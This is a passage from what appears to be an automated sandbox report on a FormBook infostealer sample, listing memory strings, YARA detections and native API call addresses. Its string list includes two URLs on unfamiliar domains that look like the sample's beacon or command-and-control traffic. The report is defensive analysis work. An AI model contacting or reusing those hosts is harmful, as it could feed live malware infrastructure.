          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230294482.0000000005BC1000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comde
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 08917506_by_Libranalysis.exeString found in binary or memory: http://www.churchsw.org/church-projector-project
          Source: 08917506_by_Libranalysis.exeString found in binary or memory: http://www.churchsw.org/repository/Bibles/
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253501338.0000000005BB0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaa
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253501338.0000000005BB0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comceco
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.229924216.0000000005BC8000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.249681781.0000000001AA7000.00000004.00000040.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmp
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230603893.0000000005BB9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/2
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/H
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230603893.0000000005BB9000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/M
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/W
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0r:
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230826809.0000000005BB6000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/)
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/2
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/M
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/p
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230701926.0000000005BB8000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/x
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230287588.0000000005BCB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230287588.0000000005BCB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comlic
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.253782761.0000000005EF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.278615680.000000000BE70000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: 08917506_by_Libranalysis.exe, 00000000.00000003.230081674.0000000005BC4000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cna
          Source: 08917506_by_Libranalysis.exe, 00000000.00000002.252118512.000000000369D000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: ipconfig.exe, 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmpString found in binary or memory: https://www.sherylabrahamphotography.com/o86d/?W6jDfD=VzK2bv7yp5iwEBdNZQjCdXXbrLCot30MtbV4orBq8x4MF4
          Source: ipconfig.exe, 0000000F.00000002.499188275.0000000003712000.00000004.00000001.sdmpString found in binary or memory: https://www.website-bazar.com/o86d/?W6jDfD=Zt5QD3TUSOnCkU7SKGg3ywaITg6vE6njEzv/4k

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.295482175.0000000001880000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.252705073.0000000004631000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.495362707.0000000000B90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.492372341.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.495228855.0000000000B50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.295106715.0000000001520000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.294777794.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.08917506_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_058A4DE2 NtQuerySystemInformation,0_2_058A4DE2
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_058A4DA8 NtQuerySystemInformation,0_2_058A4DA8
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_004181B0 NtCreateFile,5_2_004181B0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_00418260 NtReadFile,5_2_00418260
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_004182E0 NtClose,5_2_004182E0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,5_2_00418390
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_004181AA NtCreateFile,5_2_004181AA
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0041825A NtReadFile,5_2_0041825A
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_015B9910
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B99A0 NtCreateSection,LdrInitializeThunk,5_2_015B99A0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9840 NtDelayExecution,LdrInitializeThunk,5_2_015B9840
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9860 NtQuerySystemInformation,LdrInitializeThunk,5_2_015B9860
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B98F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_015B98F0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9A50 NtCreateFile,LdrInitializeThunk,5_2_015B9A50
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_015B9A00
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9A20 NtResumeThread,LdrInitializeThunk,5_2_015B9A20
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9540 NtReadFile,LdrInitializeThunk,5_2_015B9540
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B95D0 NtClose,LdrInitializeThunk,5_2_015B95D0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9710 NtQueryInformationToken,LdrInitializeThunk,5_2_015B9710
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9FE0 NtCreateMutant,LdrInitializeThunk,5_2_015B9FE0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9780 NtMapViewOfSection,LdrInitializeThunk,5_2_015B9780
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B97A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_015B97A0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_015B9660
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B96E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_015B96E0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9950 NtQueueApcThread,5_2_015B9950
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B99D0 NtCreateProcessEx,5_2_015B99D0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015BB040 NtSuspendThread,5_2_015BB040
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9820 NtEnumerateKey,5_2_015B9820
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B98A0 NtWriteVirtualMemory,5_2_015B98A0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9B00 NtSetValueKey,5_2_015B9B00
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015BA3B0 NtGetContextThread,5_2_015BA3B0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9A10 NtQuerySection,5_2_015B9A10
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9A80 NtOpenDirectoryObject,5_2_015B9A80
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9560 NtWriteFile,5_2_015B9560
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015BAD30 NtSetContextThread,5_2_015BAD30
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9520 NtWaitForSingleObject,5_2_015B9520
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B95F0 NtQueryInformationFile,5_2_015B95F0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015BA770 NtOpenThread,5_2_015BA770
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9770 NtSetInformationFile,5_2_015B9770
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9760 NtOpenProcess,5_2_015B9760
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015BA710 NtOpenProcessToken,5_2_015BA710
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9730 NtQueryVirtualMemory,5_2_015B9730
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9650 NtQueryValueKey,5_2_015B9650
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9670 NtQueryInformationProcess,5_2_015B9670
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B9610 NtEnumerateValueKey,5_2_015B9610
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015B96D0 NtCreateKey,5_2_015B96D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99840 NtDelayExecution,LdrInitializeThunk,15_2_00D99840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99860 NtQuerySystemInformation,LdrInitializeThunk,15_2_00D99860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D999A0 NtCreateSection,LdrInitializeThunk,15_2_00D999A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99910 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_00D99910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99A50 NtCreateFile,LdrInitializeThunk,15_2_00D99A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D995D0 NtClose,LdrInitializeThunk,15_2_00D995D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99540 NtReadFile,LdrInitializeThunk,15_2_00D99540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D996D0 NtCreateKey,LdrInitializeThunk,15_2_00D996D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D996E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_00D996E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99FE0 NtCreateMutant,LdrInitializeThunk,15_2_00D99FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99780 NtMapViewOfSection,LdrInitializeThunk,15_2_00D99780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99710 NtQueryInformationToken,LdrInitializeThunk,15_2_00D99710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D998F0 NtReadVirtualMemory,15_2_00D998F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D998A0 NtWriteVirtualMemory,15_2_00D998A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D9B040 NtSuspendThread,15_2_00D9B040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99820 NtEnumerateKey,15_2_00D99820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D999D0 NtCreateProcessEx,15_2_00D999D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99950 NtQueueApcThread,15_2_00D99950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99A80 NtOpenDirectoryObject,15_2_00D99A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99A10 NtQuerySection,15_2_00D99A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99A00 NtProtectVirtualMemory,15_2_00D99A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99A20 NtResumeThread,15_2_00D99A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D9A3B0 NtGetContextThread,15_2_00D9A3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99B00 NtSetValueKey,15_2_00D99B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D995F0 NtQueryInformationFile,15_2_00D995F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99560 NtWriteFile,15_2_00D99560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D9AD30 NtSetContextThread,15_2_00D9AD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99520 NtWaitForSingleObject,15_2_00D99520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99650 NtQueryValueKey,15_2_00D99650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99670 NtQueryInformationProcess,15_2_00D99670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99660 NtAllocateVirtualMemory,15_2_00D99660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99610 NtEnumerateValueKey,15_2_00D99610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D997A0 NtUnmapViewOfSection,15_2_00D997A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D9A770 NtOpenThread,15_2_00D9A770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99770 NtSetInformationFile,15_2_00D99770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99760 NtOpenProcess,15_2_00D99760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D9A710 NtOpenProcessToken,15_2_00D9A710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_00D99730 NtQueryVirtualMemory,15_2_00D99730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003C81B0 NtCreateFile,15_2_003C81B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003C8260 NtReadFile,15_2_003C8260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003C82E0 NtClose,15_2_003C82E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003C81AA NtCreateFile,15_2_003C81AA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_003C825A NtReadFile,15_2_003C825A
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_030F1D470_2_030F1D47
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_030F176C0_2_030F176C
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_03118B130_2_03118B13
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_03117D140_2_03117D14
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_0581DD700_2_0581DD70
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_05810BF00_2_05810BF0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_05810BDF0_2_05810BDF
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_09571C700_2_09571C70
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_0957CC880_2_0957CC88
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_095713600_2_09571360
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_09572BE80_2_09572BE8
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 0_2_00FC98290_2_00FC9829
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0041B8255_2_0041B825
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0041C19E5_2_0041C19E
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0041CAC55_2_0041CAC5
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_00408C505_2_00408C50
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0041C4E55_2_0041C4E5
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0041C7425_2_0041C742
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0157F9005_2_0157F900
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015941205_2_01594120
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0164E8245_2_0164E824
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_016310025_2_01631002
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_016428EC5_2_016428EC
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0158B0905_2_0158B090
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_016420A85_2_016420A8
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_015A20A05_2_015A20A0
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0159AB405_2_0159AB40
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_01642B285_2_01642B28
          Source: C:\Users\user\Desktop\08917506_by_Libranalysis.exeCode function: 5_2_0163DBD25_2_0163DBD2
